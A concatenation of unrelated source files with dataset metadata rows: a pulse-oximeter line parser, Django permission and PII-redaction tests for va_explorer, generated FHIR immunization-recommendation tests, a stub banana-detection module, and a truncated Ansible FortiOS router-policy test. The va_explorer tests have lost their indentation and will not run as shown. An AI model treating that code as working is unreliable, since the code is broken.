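# A consumer of DemoStream has to skip the banner, header, and garbage lines
# and cope with the '---' placeholders printed while the sensor is searching.
# A hedged parsing sketch, with the field layout inferred from the sample
# data above:
def parse_reading(line):
    parts = line.split()
    # Data lines start with a date such as '29-Dec-17'; anything else is a
    # banner, column header, or garbage line.
    if len(parts) < 5 or parts[0].count('-') != 2:
        return None
    spo2, bpm, pa = parts[2], parts[3], parts[4]
    if '---' in (spo2, bpm, pa):
        return None  # no reading: sensor disconnected or searching
    return {
        'time': parts[0] + ' ' + parts[1],
        # A trailing '*' appears to flag an out-of-limits SpO2 value.
        'spo2': int(spo2.rstrip('*')),
        'bpm': int(bpm),
        'pa': int(pa),
        'alarm': spo2.endswith('*'),
        'status': parts[5:],
    }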
1c0a74c803eced8810f06e8588895124ebfb2b74 | 15,290 | py | Python | va_explorer/va_data_management/tests/test_views.py | VA-Explorer/va_explorer | e43cfbff0ce5209c12134b7ac4ce439db6fc87a2 | ["Apache-2.0"] | 125 | 2020-10-07T12:00:15.000Z | 2022-03-31T21:29:21.000Z | 2 | 2020-10-29T16:08:42.000Z | 2020-12-08T19:03:41.000Z
import pytest
from django.test import Client
from django.contrib.auth.models import Permission
from va_explorer.users.models import User
from va_explorer.va_data_management.models import VerbalAutopsy
from va_explorer.tests.factories import GroupFactory, VerbalAutopsyFactory, UserFactory, LocationFactory, \
FieldWorkerFactory, FieldWorkerGroupFactory, FacilityFactory, VaUsernameFactory
from va_explorer.va_data_management.models import REDACTED_STRING
pytestmark = pytest.mark.django_db
# Get the index and make sure the VA in the system is listed
def test_index_with_valid_permission(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(va.Id10010, "utf-8") in response.content
# Get the index and make sure PII on the listed VA is redacted
def test_index_redacted(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10023='death date')
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(REDACTED_STRING, "utf-8") in response.content
assert bytes(va.Id10023, "utf-8") not in response.content
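# The two tests above pin down the redaction rule: a user with view_pii sees
# the stored value, one without it sees REDACTED_STRING. A hypothetical
# helper capturing that rule (the "va_data_management" permission app label
# is an assumption):
def visible_value(user, value):
    if user.has_perm("va_data_management.view_pii"):
        return value
    return REDACTED_STRING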
# Request the index without permissions and make sure it's forbidden
def test_index_without_valid_permission(user: User):
client = Client()
client.force_login(user=user)
response = client.get("/va_data_management/")
assert response.status_code == 403
# Show a VA and make sure the data is as expected
def test_show(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
assert bytes(va.Id10017, "utf-8") in response.content
# Show a VA and make sure the data is as expected (with redacted)
def test_show_redacted(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
assert bytes(REDACTED_STRING, "utf-8") in response.content
assert bytes(va.Id10017, "utf-8") not in response.content
# Request the show page for a VA without permissions and make sure it's forbidden
def test_show_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 403
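# The tests above all repeat the same setup dance: look up permissions,
# build a group, create a user in it, and log a client in. A hypothetical
# factoring of that idiom, using only the factories already imported here:
def logged_in_client(*codenames):
    perms = [Permission.objects.filter(codename=c).first() for c in codenames]
    user = UserFactory.create(groups=[GroupFactory.create(permissions=perms)])
    client = Client()
    client.force_login(user=user)
    return client, user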
# Request the edit form of a VA and make sure the data is as expected
def test_edit_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 200
assert bytes(va.Id10010, "utf-8") in response.content
assert bytes(va.Id10017, "utf-8") in response.content
# Request the edit form of a VA without permissions and make sure it's forbidden
def test_edit_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 403
# Update a VA and make sure 1) the data is changed and 2) the history is tracked
def test_save_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_view_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == new_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 2
assert va.history.first().history_user == user
response = client.get(f"/va_data_management/show/{va.id}")
# TODO: We need to handle timezones correctly
assert bytes(va.history.first().history_date.strftime('%Y-%m-%d %H:%M'), "utf-8") in response.content
assert bytes(va.history.first().history_user.name, "utf-8") in response.content
# Update a VA with an invalid date and make sure there is no redirect.
# TODO: check form.errors, or create a separate form test, to make this more
# accurate.
def test_save_with_invalid_date_format(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_view_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"this is not a date 1234" })
assert response.status_code == 200
# Verify save access is restricted
def test_save_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name })
assert response.status_code == 403
# Reset an updated VA and make sure 1) the data is reset to original values and 2) the history is tracked
def test_reset_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
original_name = va.Id10010
original_dod = va.Id10023
new_name = "Updated Name"
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == new_name
assert va.history.count() == 2
# TODO: Switch the buttons to forms in show.html and make this a POST.
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == original_name
assert va.Id10023 == original_dod
assert va.history.count() == 3
assert va.history.first().history_user == user
# Verify reset access is restricted
def test_reset_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 403
# Revert an updated VA and make sure 1) the data is reset to previous version and 2) the history is tracked
def test_revert_latest_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
original_name = va.Id10010
second_name = "Second Name"
third_name = "Third Name"
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": second_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == second_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 2
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": third_name, "Id10023":"2021-03-02", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == third_name
assert va.Id10023 == "2021-03-02"
assert va.history.count() == 3
# TODO: Switch the buttons to forms in show.html and make this a POST.
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == second_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 4
assert va.history.first().history_user == user
# Verify revert access is restricted
def test_revert_latest_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 403
# Test all methods for access control restrictions
def test_access_control(user: User):
# Set up a location tree so the user can be scoped without access to a VA
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record])
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_edit_record_group, can_view_record_group])
province = LocationFactory.create()
district1 = province.add_child(name='District1', location_type='district')
district2 = province.add_child(name='District2', location_type='district')
facility = district1.add_child(name='Facility', location_type='facility')
va = VerbalAutopsyFactory.create(location=facility, Id10023='death date')
user.location_restrictions.set([district2]) # Should not have access to VA
client = Client()
client.force_login(user=user)
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(va.Id10023, "utf-8") not in response.content
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 404
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 404
response = client.post(f"/va_data_management/edit/{va.id}", { "10023": "new death date" })
assert response.status_code == 404
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 404
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 404
# A Field Worker can access only the Verbal Autopsies they created, matched
# via the username on the Verbal Autopsy
def test_field_worker_access_control():
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
field_worker_group = FieldWorkerGroupFactory.create(permissions=[can_view_record, can_view_pii])
field_worker = FieldWorkerFactory.create(groups=[field_worker_group])
field_worker_username = VaUsernameFactory.create(user=field_worker)
facility = FacilityFactory.create()
    field_worker.location_restrictions.add(facility)
field_worker.save()
field_worker_username.save()
va = VerbalAutopsyFactory.create(Id10017='deceased_name_1', Id10010='Role specific value', location=facility, username=field_worker_username.va_username)
va2 = VerbalAutopsyFactory.create(Id10017='deceased_name_2', location=facility, username='')
client = Client()
client.force_login(user=field_worker)
response = client.get("/va_data_management/")
assert response.status_code == 200
assert str(va.Id10017).encode('utf_8') in response.content
assert str(va.Id10010).encode('utf_8') not in response.content # field workers see deceased, not interviewer
assert str(va2.Id10017).encode('utf_8') not in response.content
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
response = client.get(f"/va_data_management/show/{va2.id}")
assert response.status_code == 404
1c7bcd8c61a2bb1acdc63aee255a2c4e0f114aac | 8,287 | py | Python | fhirclient/r4models/immunizationrecommendation_tests.py | cspears-mitre/CapStatement | 2390566ed75d420e0615e3a0aacb77e8c030fdcc | ["Apache-2.0"] | 1 | 2021-12-24T11:14:38.000Z | 2021-12-24T11:14:38.000Z
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.6.0-bd605d07 on 2018-12-20.
# 2018, SMART Health IT.
import os
import io
import unittest
import json
from . import immunizationrecommendation
from .fhirdate import FHIRDate
class ImmunizationRecommendationTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
return immunizationrecommendation.ImmunizationRecommendation(js)
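    # Every test below follows the same round-trip pattern: build the model
    # from JSON, run the assertions, serialize with as_json(), rebuild, and
    # run the assertions again. A compact sketch of that pattern as a helper
    # (illustrative; the generated tests keep it inline):
    def round_trip(self, inst, impl):
        impl(inst)
        js = inst.as_json()
        self.assertEqual("ImmunizationRecommendation", js["resourceType"])
        impl(immunizationrecommendation.ImmunizationRecommendation(js))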
def testImmunizationRecommendation1(self):
inst = self.instantiate_from("immunizationrecommendation-example.json")
        self.assertIsNotNone(inst, "Must have instantiated an ImmunizationRecommendation instance")
self.implImmunizationRecommendation1(inst)
js = inst.as_json()
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
inst2 = immunizationrecommendation.ImmunizationRecommendation(js)
self.implImmunizationRecommendation1(inst2)
def implImmunizationRecommendation1(self, inst):
self.assertEqual(inst.date.date, FHIRDate("2015-02-09T11:04:15.817-05:00").date)
self.assertEqual(inst.date.as_json(), "2015-02-09T11:04:15.817-05:00")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
self.assertEqual(inst.identifier[0].value, "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1235")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].code, "earliest")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].display, "Earliest Date")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].code, "recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].display, "Recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].code, "overdue")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].display, "Past Due Date")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.date, FHIRDate("2016-12-28T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.as_json(), "2016-12-28T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].description, "First sequence in protocol")
self.assertEqual(inst.recommendation[0].doseNumberPositiveInt, 1)
self.assertEqual(inst.recommendation[0].forecastStatus.text, "Not Complete")
self.assertEqual(inst.recommendation[0].series, "Vaccination Series 1")
self.assertEqual(inst.recommendation[0].seriesDosesPositiveInt, 3)
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].code, "14745005")
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].display, "Hepatitis A vaccine")
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">Authored by Joginder Madra</div>")
self.assertEqual(inst.text.status, "generated")
def testImmunizationRecommendation2(self):
inst = self.instantiate_from("immunizationrecommendation-example-target-disease.json")
        self.assertIsNotNone(inst, "Must have instantiated an ImmunizationRecommendation instance")
self.implImmunizationRecommendation2(inst)
js = inst.as_json()
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
inst2 = immunizationrecommendation.ImmunizationRecommendation(js)
self.implImmunizationRecommendation2(inst2)
def implImmunizationRecommendation2(self, inst):
self.assertEqual(inst.date.date, FHIRDate("2015-02-09T11:04:15.817-05:00").date)
self.assertEqual(inst.date.as_json(), "2015-02-09T11:04:15.817-05:00")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
self.assertEqual(inst.identifier[0].value, "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1235")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].code, "30981-5")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].display, "Earliest date to give")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].system, "http://loinc.org")
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].code, "recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].display, "Recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].code, "overdue")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].display, "Past Due Date")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.date, FHIRDate("2016-12-28T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.as_json(), "2016-12-28T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].description, "First sequence in protocol")
self.assertEqual(inst.recommendation[0].doseNumberPositiveInt, 1)
self.assertEqual(inst.recommendation[0].forecastStatus.text, "Not Complete")
self.assertEqual(inst.recommendation[0].series, "Vaccination Series 1")
self.assertEqual(inst.recommendation[0].seriesDosesPositiveInt, 3)
self.assertEqual(inst.recommendation[0].targetDisease.coding[0].code, "40468003")
self.assertEqual(inst.recommendation[0].targetDisease.coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">Authored by Joginder Madra</div>")
self.assertEqual(inst.text.status, "generated")
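
# The tests above follow a JSON round-trip pattern: instantiate the resource from an
# example file, assert every field, serialize with as_json(), re-parse, and run the
# same assertions again. The same idea in isolation (a hypothetical helper, not part
# of the generated suite):
def assert_json_roundtrip(resource_cls, js, impl):
    inst = resource_cls(js)                 # parse the JSON dict
    impl(inst)                              # field-level assertions
    impl(resource_cls(inst.as_json()))      # serialize, re-parse, re-assert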
| 73.336283
| 168
| 0.722457
| 1,025
| 8,287
| 5.826341
| 0.15122
| 0.170797
| 0.206798
| 0.24866
| 0.866879
| 0.857669
| 0.857669
| 0.837575
| 0.826356
| 0.806597
| 0
| 0.073886
| 0.122964
| 8,287
| 112
| 169
| 73.991071
| 0.747799
| 0.014119
| 0
| 0.65625
| 1
| 0.020833
| 0.225257
| 0.090397
| 0
| 0
| 0
| 0
| 0.729167
| 1
| 0.052083
| false
| 0
| 0.0625
| 0
| 0.135417
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 1c9a320a2f92aaf68f458e3d86d8b3a10588bf95
| 340
| py
| Python
| solution.py
| mathewphilipc/homemade_yolo
| 4d1da96b833459aa323752ee9cb3e3c633d7bca9
| ["MIT"] | null | null | null |
| solution.py
| mathewphilipc/homemade_yolo
| 4d1da96b833459aa323752ee9cb3e3c633d7bca9
| ["MIT"] | null | null | null |
| solution.py
| mathewphilipc/homemade_yolo
| 4d1da96b833459aa323752ee9cb3e3c633d7bca9
| ["MIT"] | null | null | null |
def contains_banana(img):
    """
    Change the contents of this function so it behaves correctly
    """
    # Placeholder: a finished solution should return a bool, not this float sentinel.
    return -3.14159

def crop_image(img, quadrant):
    """
    Change the contents of this function so it behaves correctly
    """
    # Placeholder: returns the input image uncropped.
    return img

def find_banana(img):
    """
    Change the contents of this function so it behaves correctly
    """
    # Placeholder: note this is the string "None", not the None object.
    return "None"
| 20
| 61
| 0.723529
| 50
| 340
| 4.86
| 0.44
| 0.111111
| 0.209877
| 0.234568
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.021583
| 0.182353
| 340
| 17
| 62
| 20
| 0.852518
| 0.535294
| 0
| 0
| 0
| 0
| 0.030534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 98d25361302cb6cc6bf0c6da61f959885619c9d8
| 11,853
| py
| Python
| v6.0.5/router/test_fortios_router_policy.py
| fortinet-solutions-cse/ansible_fgt_modules
| c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
| ["Apache-2.0"] | 14
| 2018-09-25T20:35:25.000Z
| 2021-07-14T04:30:54.000Z
| v6.0.6/router/test_fortios_router_policy.py
| fortinet-solutions-cse/ansible_fgt_modules
| c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
| ["Apache-2.0"] | 32
| 2018-10-09T04:13:42.000Z
| 2020-05-11T07:20:28.000Z
| v6.0.5/router/test_fortios_router_policy.py
| fortinet-solutions-cse/ansible_fgt_modules
| c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
| ["Apache-2.0"] | 11
| 2018-10-09T00:14:53.000Z
| 2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_policy
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_router_policy.Connection')
return connection_class_mock
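# Note: `connection_mock` below is the fixture function object itself, not a Connection
# instance. This is tolerated because every test patches FortiOSHandler's set/delete
# methods, so whatever the handler stored is never actually used.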
fos_instance = FortiOSHandler(connection_mock)
def test_router_policy_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_policy_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_policy_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'policy', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_policy_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
